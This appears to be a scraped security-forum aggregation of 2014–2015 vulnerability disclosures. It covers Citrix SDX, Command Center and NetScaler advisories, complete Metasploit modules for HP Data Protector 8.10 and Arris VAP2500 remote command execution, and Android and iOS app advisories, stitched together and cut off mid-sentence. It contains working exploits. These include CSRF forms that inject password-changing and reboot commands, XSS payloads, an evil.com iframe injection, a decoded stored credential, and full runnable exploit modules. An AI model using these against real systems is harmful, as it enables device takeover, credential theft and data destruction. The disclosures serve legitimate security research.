/nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. The following proof of concept can be used to exploit this issue; <html> <body> <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST"> <input type="hidden" name="object" value="{"params":{"action":"start"},"xen_hotfix":[{"file_name":"../../etc/passwd;echo nsroot:Securify|chpasswd;"}]}" /> <input type="submit" value="Submit request" /> </form> <script>document.forms[0].submit();</script> </body> </html> POST /nitro/v1/config/xen_hotfix HTTP/1.1 ----------------------------------------- object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]} or object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]} Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page. Citrx Command Center Advent JMX Servlet Accessible ------------------------------------------------------------------------ Advent JMX Servlet of Citrx Command Center is accessible to unauthenticated users ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the Advent JMX Servlet of Citrix Command Center is accessible to unauthenticated users. This issue can be abused by attackers to comprise the entire application. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0494204 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140804/advent_jmx_servlet_of_citrx_command_center_is_accessible_to_unauthenticated_users.html The Advent JMX Servlet is exposed at /servlets/Jmx_dynamic. Functionality exposed by the JMX Servlet can be invoked by an unauthenticated attacker, which can lead to unauthorized remote code execution and comprise of the entire application and services. In addition, this interface is also affected by Cross-Site Scripting. For example: https://<target>:8443/servlets/Jmx_dynamic?fname=<script>alert(document.cookie);</script> Citrix NetScaler VPX Cross Site Scripting ------------------------------------------------------------------------ Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the help pages of Citrix VPX are vulnerable to Cross-Site Scripting. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10, other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.8nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.html This issue exists because the value of the searchQuery URL parameter is assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site Scripting), for example: https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTV Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Citrix NITRO SDK xen_hotfix Cross Site Scripting ------------------------------------------------------------------------ Citrix NITRO SDK xen_hotfix page is vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the xen_hotfix page of the Citrix NITRO SDK. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9;, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140805/citrix_nitro_sdk_xen_hotfix_page_is_vulnerable_to_cross_site_scripting.html The Cross-Site Scripting vulnerability exists because the REST interface returns an incorrect Content-Type HTTP response header. The interfaces states that the content returned is HTML, while in fact it is JSON. Due to this it is possible to cause browser to render the JSON response as HTML. User input included in the JSON response is JSON encoded, not HTML encoded. Due to this, it is possible to inject arbitrary HTML content in the JSON data that will be rendered and executed by the browser. This issue is exploitable on the /nitro/v1/config/xen_hotfix page through the file_name parameter. Below is an example HTTP response in which this issue is demonstrated. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Wed, 16 Jul 2014 13:54:53 GMT { "errorcode": 16004, "message": "Failed to obtain uuid for hotfix cmd.xsupdate<img src=a onerror=alert(document.cookie)>, error string = 'xe patch-upload file-name=\"\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>\"\r\nOperation failed. Error: file '\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>' does not exist\r\n\u001b]0;root@NetScaler-sdx:~\u0007[root@NetScaler-sdx ~]#'", "severity": "ERROR" } Proof of concept: <html> <body> <form id="form" method="POST" action="https://<target>/nitro/v1/config/xen_hotfix" enctype="text/plain"> <input type="hidden" name="object" value='{"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a [{"file_name"%3a" cmd.xsupdate<img%20src%3da%20onerror%3dalert(document.cookie)>"}]}' /> <input type="submit" value="submit"> </form> <script> document.forms[0].submit(); </script> </body> </html> Citrix Command Center Configuration Disclosure ------------------------------------------------------------------------ Citrix Command Center allows downloading of configuration files ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. Unauthenticated attackers can download any configuration file stored in this folder, decode passwords stored in these files, and gain privileged access to devices managed by Command Center. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0493933 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140802/citrix_command_center_allows_downloading_of_configuration_files.html Configuration files can be downloaded from the conf web folder. Below is an example of a configuration file that can be obtained this way. https://<target>:8443/conf/securitydbData.xml This files contains encoded passwords, for example: <DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/> These passwords can be decoded trivially. The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center.
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FOLDER_NAME') deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end Source
-
Secure rm (srm) is a command-line compatible rm(1) which completely destroys file contents before unlinking. The goal is to provide drop in security for users who wish to prevent command line recovery of deleted information, even if the machine is compromised. Changes: Various updates. Download Sourceforge: srm - secure file deletion for posix systems
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Arris VAP2500 tools_command.php Command Execution', 'Description' => %q{ Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username. }, 'Author' => [ 'HeadlessZeke' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8423'], ['CVE', '2014-8424'], ['OSVDB', '115045'], ['OSVDB', '115046'], ['BID', '71297'], ['BID', '71299'], ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/'] ], 'DisclosureDate' => 'Nov 25 2014', 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0 )) end def check begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/tools_command.php', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd else exploit_session end end def exploit_cmd beg_boundary = rand_text_alpha(8) end_boundary = rand_text_alpha(8) begin res = send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ print_good("#{peer} - Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m print_status("#{peer} - Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit_session begin send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "#{payload.encoded}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
-
CONTENTS Introduction 4 Executive summary 4 1 The initial incident 5 2 Analysis 6 2.1 Plug-in ................................................................................................................................................ 6 2.2 Origin.................................................................................................................................................. 9 2.3 Features............................................................................................................................................ 11 2.4 Setup ................................................................................................................................................ 11 2.5 CMS integration................................................................................................................................ 13 2.6 Crypto and Communication ............................................................................................................. 15 2.7 Manual Control ................................................................................................................................ 17 2.8 Configuration.................................................................................................................................... 18 2.9 Backup communication.................................................................................................................... 19 2.10 Purpose: Blackhat SEO ..................................................................................................................... 20 2.11 Possible author................................................................................................................................. 22 3 Infrastructure 23 3.1 Spreading.......................................................................................................................................... 23 3.2 Command and control servers......................................................................................................... 24 4 Checking for CryptoPHP in plug-ins and themes 26 4.1.1 WordPress......................................................................................................................... 26 4.1.2 Joomla ............................................................................................................................... 27 4.1.3 Drupal................................................................................................................................ 27 5 Appendix: Indicators of Compromise 28 5.1 Network detection ........................................................................................................................... 28 5.2 File hashes........................................................................................................................................ 29 5.3 Command and Control servers......................................................................................................... 30 5.3.1 Version 0.1......................................................................................................................... 30 5.3.2 Version 0.1 (other variant) ................................................................................................ 30 5.3.3 Version 0.2, 0.2x1, 0.2x2, 0.2b3, 0x2x4, 0.2x9, 0.3, 0.3x1................................................. 35 5.3.4 Version 1.0, 1.0a................................................................................................................ 39 5.4 Backup communication email addresses......................................................................................... 42 5.4.1 Version 0.1......................................................................................................................... 42 5.4.2 Version 0.1 (other variant) ................................................................................................ 42 5.4.3 Version 0.2, 0.2x1, 0.2x2, 0.2b3, 0.2x4, 0.2x9, 0.3 ............................................................ 42 5.4.4 Version 1.0, 1.0a................................................................................................................ 50 Read more: http://dl.packetstormsecurity.net/papers/evaluation/cryptophp-whitepaper-foxsrt-v4.pdf
-
- 1
-
- command
- communication
-
(and 3 more)
Tagged with:
-
Document Title: =============== Remote Desktop v0.9.4 Android - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1413 Release Date: ============= 2015-01-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1413 Common Vulnerability Scoring System: ==================================== 4.4 Product & Service Introduction: =============================== Remote Desktop brings order to your Droid. View and retrieve all the contents of your phone such as documents, photos, videos. All you need is a standard web browser (! the latest Chrome or Firefox !) and Remote Desktop will allow you interact with your phone as easily as a PC. (Copy of the Homepage: http://remote-desktop.android.informer.com/0.9.4/ & https://play.google.com/store/apps/details?id=pl.androiddev.mobiletab ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Desktop v0.9.4 Android mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Damian Kolakowski Product: Remote Desktop - Android Mobile Web Application 0.9.4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple vulnerabilities has been discovered in the Remote Desktop v0.9.4 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. 1.1 The local command injection vulnerability is located in `cmd` value of the `/api/sms` file. The remote attackers performs a client-side request and manipulates the `cmd` value to compromise the web-app by a local command injection. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.5. Exploitation of the command/path inject vulnerability requires no privileged android device user account or user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile android application and the connected device. Request Method(s): [+] [GET] Vulnerable Module(s): [+] /api/sms Vulnerable Parameter(s): [+] cmd=%3Cform%20action=api/[x]?cmd= 1.2 The cross site request forgery vulnerabilities are located in the `shell`,`sms`,`calllogs` and `files` sections of the android app. Remote attackers are able prepare special crafted URLs that executes client-side requests to execute application functions (delete,add, call, send). The requst method to execute a function in a client-side request is GET. The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4. Exploitation of the client-side web vulnerability requires no privileged web-application user account but medium or high user interaction. Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected module context. Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] shell [+] sms [+] calllogs Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. [REMOTE SHELL CODE EXECUTE VULNERABILI! CSRF ] <img src="http://localhost:8080/api/shell?cmd=execute&command=id&token=111111111111" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/shell?cmd=execute&command=id&token=111111111111 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK","working-directory":"\/","stderr":"","stdout":"uid=10257(u0_a257) gid=10257(u0_a257) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)\n"} Send SMS <img src="http://localhost:8080/api/sms?cmd=send&token=111111111111&to=333&message=HELLO " width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/sms?cmd=send&token=111111111111&to=333&message=HELLO HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421469722760 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK","results":[{"id":1590,"address":"333"}], "thread":{"id":51,"read":false,"snippet":"HELLO","recipients_snippet":"333", "message_count":70,"date":1421476972278,"recipients":[{"id":51,"address":"333"}]}} Call Phone <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/calllogs?cmd=make_call&number=0674086422 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Delete File <img src="http://localhost:8080/api/files?cmd=delete&sep=/&path=/file" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/files?cmd=delete&sep=/&path=%2Fstorage%2Femmc%2FRWDFv5.9.5.apk HTTP/1.1 Host: 192.168.1.6:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/index.html?nocache=1421449820153 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Call Phone <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/calllogs?cmd=make_call&number=11111111111 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Delete all SMS <img src="http://localhost:8080/api/sms?cmd=delete_all" width="0" height="0" border="0"> GET /api/sms?cmd=delete_all HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} LOCAL COMMAND INJECTION VULNERABILITY shell?, sms?, calllogs?files? --- PoC Session Logs [GET] (Execution) --- GET /api/sms?cmd=%3Cform%20action=api/sms?cmd=[LOCAL COMMAND INJECTION VULNERABILITY!] HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - Response {"response":"OK"} HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"Unknown command: [LOCAL COMMAND INJECTION VULNERABILITY!]"} Reference: http://localhost:8080/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Remote Desktop 0.9.4 Android CSRF / Command Injection ? Packet Storm
-
Document Title: =============== VeryPhoto v3.0 iOS - Command Injection Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1401 Release Date: ============= 2015-01-13 Vulnerability Laboratory ID (VL-ID): ==================================== 1401 Common Vulnerability Scoring System: ==================================== 5.6 Product & Service Introduction: =============================== VeryPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos, while giving you an unprecedented user experience. No in-app purchase, no functional limitations. album password - effectively protect your privacy. multi-touch browsing - Personalized operation allows you to have a different user experience. professional photo editing features - lets you easily have a professional-grade graphics processing technology. (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a local command inject web vulnerability in the official VeryPhoto v3.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Cheng Chen Product: VeryPhoto - iOS Web Application (WiFi) 3.0 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A local command inject web vulnerability has been discovered in the official VeryPhoto v3.0 iOS mobile web-application. The vulnerability allows remote attackers to inject own commands by usage of stored manipulated system/device values to compromise the apple mobile iOS application. The command inject vulnerability is located in the vulnerable `albumname` value of the `HTTP Wifi Server`. Local attackers are able to inject own malicious system specific commands or path value requests by usage of the vulnerable `albumname` value. The execution of 